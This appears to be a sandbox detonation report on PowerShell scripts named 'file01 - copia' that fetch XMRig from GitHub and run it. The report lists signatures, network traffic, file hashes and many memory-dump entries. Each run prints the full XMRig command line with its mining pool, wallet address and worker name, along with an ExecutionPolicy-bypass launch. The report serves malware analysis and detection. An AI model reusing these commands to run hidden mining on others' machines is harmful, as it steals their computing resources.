Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp

Files

memory/5052-3-0x00007FFF8B983000-0x00007FFF8B984000-memory.dmp

memory/5052-5-0x000001FBBCB60000-0x000001FBBCB82000-memory.dmp

memory/5052-6-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-9-0x000001FBBCC10000-0x000001FBBCC86000-memory.dmp

memory/5052-10-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_apugeo1e.1yu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5052-26-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-49-0x000001FBBCDB0000-0x000001FBBCDC2000-memory.dmp

memory/5052-62-0x000001FBBCD90000-0x000001FBBCD9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3056-91-0x00000217526D0000-0x00000217526F0000-memory.dmp

memory/3056-92-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/5052-93-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

memory/5052-95-0x00007FFF8B983000-0x00007FFF8B984000-memory.dmp

memory/3056-94-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-96-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-97-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-98-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-99-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-100-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-101-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-102-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-103-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-104-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-105-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-106-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-107-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-108-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-109-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-110-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-111-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-112-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-113-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-114-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-115-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-116-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-117-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-118-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-119-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-120-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-121-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-122-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-123-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-124-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-125-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-126-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-127-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-128-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-129-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-130-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-131-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-132-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-133-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-134-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-135-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-136-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-137-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-138-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-139-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-140-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-141-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-142-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-143-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-144-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-145-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-146-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-147-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-148-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-149-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-150-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-151-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-152-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-153-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-154-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-155-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

memory/3056-156-0x00007FF70FEC0000-0x00007FF710AF3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:04

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp

Files

memory/4240-4-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

memory/4240-5-0x000001FA5ACB0000-0x000001FA5ACD2000-memory.dmp

memory/4240-8-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-10-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pyng0cd.oj5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4240-9-0x000001FA5AFB0000-0x000001FA5B026000-memory.dmp

memory/4240-25-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-48-0x000001FA5AF70000-0x000001FA5AF82000-memory.dmp

memory/4240-61-0x000001FA5AD10000-0x000001FA5AD1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1584-90-0x00000226E4160000-0x00000226E4180000-memory.dmp

memory/1584-91-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-92-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/4240-93-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

memory/4240-94-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/1584-95-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-96-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-97-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-98-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-99-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-100-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-101-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-102-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-103-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-104-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-105-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-106-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-107-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-108-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-109-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-110-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-111-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-112-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-113-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-114-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-115-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-116-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-117-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-118-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-119-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-120-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-121-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-122-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-123-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-124-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-125-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-126-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-127-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-128-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-129-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-130-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-131-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-132-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-133-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-134-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-135-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-136-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-137-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-138-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-139-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-140-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-141-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-142-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-143-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-144-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-145-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-146-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-147-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-148-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-149-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-150-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-151-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-152-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-153-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-154-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

memory/1584-155-0x00007FF759DD0000-0x00007FF75AA03000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:05

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

memory/2252-0-0x00007FFDAAF23000-0x00007FFDAAF25000-memory.dmp

memory/2252-6-0x0000024D6A990000-0x0000024D6A9B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ai2w5ekk.xrs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2252-11-0x00007FFDAAF20000-0x00007FFDAB9E1000-memory.dmp

memory/2252-12-0x00007FFDAAF20000-0x00007FFDAB9E1000-memory.dmp

memory/2252-14-0x00007FFDAAF20000-0x00007FFDAB9E1000-memory.dmp

memory/2252-15-0x0000024D6D190000-0x0000024D6D1A2000-memory.dmp

memory/2252-16-0x0000024D6A9E0000-0x0000024D6A9EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3368-47-0x000002146AC50000-0x000002146AC70000-memory.dmp

memory/3368-48-0x000002146C670000-0x000002146C690000-memory.dmp

memory/3368-49-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-52-0x000002146C690000-0x000002146C6B0000-memory.dmp

memory/3368-50-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-51-0x000002146C6B0000-0x000002146C6D0000-memory.dmp

memory/2252-53-0x00007FFDAAF23000-0x00007FFDAAF25000-memory.dmp

memory/2252-54-0x00007FFDAAF20000-0x00007FFDAB9E1000-memory.dmp

memory/3368-55-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/2252-56-0x00007FFDAAF20000-0x00007FFDAB9E1000-memory.dmp

memory/3368-57-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-59-0x000002146C690000-0x000002146C6B0000-memory.dmp

memory/3368-58-0x000002146C6B0000-0x000002146C6D0000-memory.dmp

memory/3368-60-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-61-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-62-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-63-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-64-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-65-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-66-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-67-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-68-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-69-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-70-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-71-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-72-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-73-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-74-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-75-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-76-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-77-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-78-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-79-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-80-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-81-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-82-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-83-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-84-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-85-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-86-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-87-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-88-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-89-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-90-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-91-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

memory/3368-92-0x00007FF6A0460000-0x00007FF6A1093000-memory.dmp

